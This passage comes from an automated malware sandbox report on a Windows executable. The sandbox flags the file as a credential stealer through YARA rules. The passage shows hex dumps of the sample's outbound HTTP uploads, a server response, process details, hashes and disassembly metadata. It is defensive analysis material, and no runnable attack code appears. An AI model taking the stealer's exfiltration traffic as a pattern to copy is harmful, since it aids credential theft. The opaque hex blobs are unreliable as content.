                                                                                                              2024-12-27 08:02:09 UTC15331OUTData Raw: f6 83 bf fa 10 a2 e1 13 02 68 e2 29 47 56 90 59 4a e0 f4 4b 32 c8 86 d5 31 9c 4d 08 4e 25 92 05 37 cf ec 03 bd 3a 63 bf 5e 3d 0b 83 6d a4 c1 85 18 c8 06 af f3 02 e4 2b e3 06 fe d2 cd d6 96 02 4d 92 14 31 30 2b 0a b5 42 a4 08 aa d9 0f e1 9c 0b 44 6b 31 ce e5 c8 34 9f 0d 9f 0b dc 44 66 c9 e1 f1 e2 bd 86 43 42 98 03 d8 e6 e3 61 aa a8 d3 9a 90 00 b3 a0 9e 18 03 da 36 07 6a 47 52 ce 92 10 e5 97 c4 85 21 22 3c 80 1d 87 7e bc 6f 54 4c c0 02 5e 48 4c f1 e1 55 f8 33 40 11 f3 ef 37 7d 40 41 ef 15 42 a2 51 f0 34 b8 04 b2 0b 38 58 e6 7f 26 bb a3 23 14 4a 15 09 7a e8 9f 73 59 40 03 18 94 e6 c5 99 c4 a2 ad 5a 84 ea 56 62 38 57 b4 d0 36 dc 44 16 55 5b 70 78 38 ef f3 c2 9c 89 14 f2 2c 61 04 0b 7e ce 35 5a 68 5c a7 25 a0 61 25 b9 c5 11 03 60 fa 68 4e 71 fe 14 3e 7b a7 83
                                                                                                              Data Ascii: h)GVYJK21MN%7:c^=m+M10+BDk14DfCBa6jGR!"<~oTL^HLU3@7}@ABQ48X&#JzsY@ZVb8W6DU[px8,a~5Zh\%a%`hNq>{
                                                                                                              2024-12-27 08:02:09 UTC15331OUTData Raw: 7d 5a 11 6a bc 6a 3e 20 1f 27 c5 39 7e 24 49 11 85 da df 95 ad 6e 17 84 43 b9 a6 95 a9 1e 41 21 d7 33 c4 24 67 74 f6 f1 f3 bb 57 60 b7 bd 5b e5 7b f0 13 6f b7 f2 d6 0f 70 18 9b 41 ee 42 0c 1d 6d 4b bb 90 70 6a 2f f7 af 3d 8c 47 90 44 43 ba d6 d5 64 82 a4 b6 f7 b0 92 7d e8 41 ee e3 10 83 87 89 61 c8 77 53 e4 af ab 24 cd 1b cf be f0 a7 4f ff f7 da 53 36 12 cf 45 44 ad c8 4b 92 d8 fc c6 ec 3c f1 e0 fd a2 28 80 9a cd bc a8 d1 cc 8e 66 98 3e 89 d4 db 7c 5d ab 6e c5 5f e3 d5 8a 7c a3 94 c0 58 35 f4 26 08 ef 9f 0e 34 69 95 94 f9 f7 18 fc a9 3f 9e 92 f0 89 a6 82 7d ef ef b7 2e bf 6e 27 4b 93 23 ca 0f 06 c7 ac 7f d9 fe 7a e7 04 f9 0e 6f dc 1f b9 69 50 c8 cd 3d 45 b0 4c 2e 42 0a f7 2a de b8 00 07 02 6a 38 d5 9a cb cc e5 89 f4 bb a4 ef d6 e0 c2 d3 87 03 c2 47 44 1c
                                                                                                              Data Ascii: }Zjj> '9~$InCA!3$gtW`[{opABmKpj/=GDCd}AawS$OS6EDK<(f>|]n_|X5&4i?}.n'K#zoiP=EL.B*j8GD
                                                                                                              2024-12-27 08:02:09 UTC15331OUTData Raw: 4b a0 6e fa 51 a8 39 67 f0 a3 2c 87 d7 5f 36 b0 1e e1 db 76 13 bb f2 bd 41 74 9c bd 73 70 a0 41 cc 03 af 14 de 46 ed 52 a6 fe 38 fb 63 13 e0 0d 7e da 30 2b a5 1b 3a f0 2e 94 1b 3c 9b 8d 96 2f ed 3c a7 3c e7 7c 73 78 27 7b f2 74 67 45 32 6e 75 1b 7b cd 62 a1 af 1c 5d 33 e3 5c c3 d6 28 99 a8 95 ed 1d 8d b1 11 07 ac 77 96 d5 7f 06 07 0e 0b 81 90 e9 9f 00 0c 04 fd f1 9c 65 1f 0f 13 d0 25 3d 13 60 dc 8c 64 0c 08 42 c4 84 13 9e 45 ff 68 28 99 cd f6 36 01 06 1b ff 05 8f 25 d7 31 ff 6f b9 83 36 44 de 88 ba f1 f3 e0 53 d1 8d 58 c5 de f0 94 2d 06 38 3d 94 89 b8 23 cb e6 aa 42 58 83 84 76 34 12 3b 4b 52 38 5b 8a 9a 10 8f 0c a6 97 b5 53 ef 2a ac 12 91 07 a2 be 6d 0f 09 f3 43 99 cb 48 9f 0b 60 da fd 8a fb 36 70 68 c7 da 7e a3 91 74 9c 14 b0 12 5c 73 3f 2a f5 12 e8 32
                                                                                                              Data Ascii: KnQ9g,_6vAtspAFR8c~0+:.</<<|sx'{tgE2nu{b]3\(we%=`dBEh(6%1o6DSX-8=#BXv4;KR8[S*mCH`6ph~t\s?*2
                                                                                                              2024-12-27 08:02:12 UTC1137INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 27 Dec 2024 08:02:11 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=8lhp6ffhhu8svmq2heu8hjnmsi; expires=Tue, 22 Apr 2025 01:48:50 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7TlVPlEO%2FtfCuFOZpK%2B5zgxoDfY7xvqTgJaAvqg%2FefLu32jX35OpIF8IBXW6fUumANwK14fvizYLQplzjmcOmqbeOP1TvA49c778R6a%2Fvb2TFHCelYEd%2BoKNb%2BXJBgcJD9A%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f87c96a0cb5c413-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1649&rtt_var=630&sent=207&recv=606&lost=0&retrans=0&sent_bytes=2837&recv_bytes=587395&delivery_rate=1722713&cwnd=173&unsent_bytes=0&cid=3d2c640b8cdb224f&ts=2694&x=0"


                                                                                                              Statistics

                                                                                                              CPU Usage

                                                                                                              Click to jump to process

                                                                                                              Memory Usage

                                                                                                              Click to jump to process

                                                                                                              High Level Behavior Distribution

                                                                                                              Click to dive into process behavior distribution

                                                                                                              System Behavior

                                                                                                              General

                                                                                                              Target ID:0
                                                                                                              Start time:03:01:50
                                                                                                              Start date:27/12/2024
                                                                                                              Path:C:\Users\user\Desktop\onaUtwpiyq.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\Desktop\onaUtwpiyq.exe"
                                                                                                              Imagebase:0x900000
                                                                                                              File size:1'869'312 bytes
                                                                                                              MD5 hash:7C96EEE8E62CAEDAD10358116F0B8024
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1482497732.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1482232390.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Reputation:low
                                                                                                              Has exited:true

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Non-executed Functions

                                                                                                                Function 007FB021 Relevance: .4, Instructions: 390COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000003.1506033237.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 007F0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_3_7e2000_onaUtwpiyq.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bdd65aa353b8263d97b7df98dc081bde2c5e9a527f0df33b5d5250d689815bbf
                                                                                                                • Instruction ID: a479ef941ee23e644b4e61d3b3f2c973254b4aa38e46ec8bbd9a48ce11ded156
                                                                                                                • Opcode Fuzzy Hash: bdd65aa353b8263d97b7df98dc081bde2c5e9a527f0df33b5d5250d689815bbf
                                                                                                                • Instruction Fuzzy Hash: D791BEA280E3C48FDB138B70887A595BF70AE2761471E81DFC9C59F5A3E24D490AD763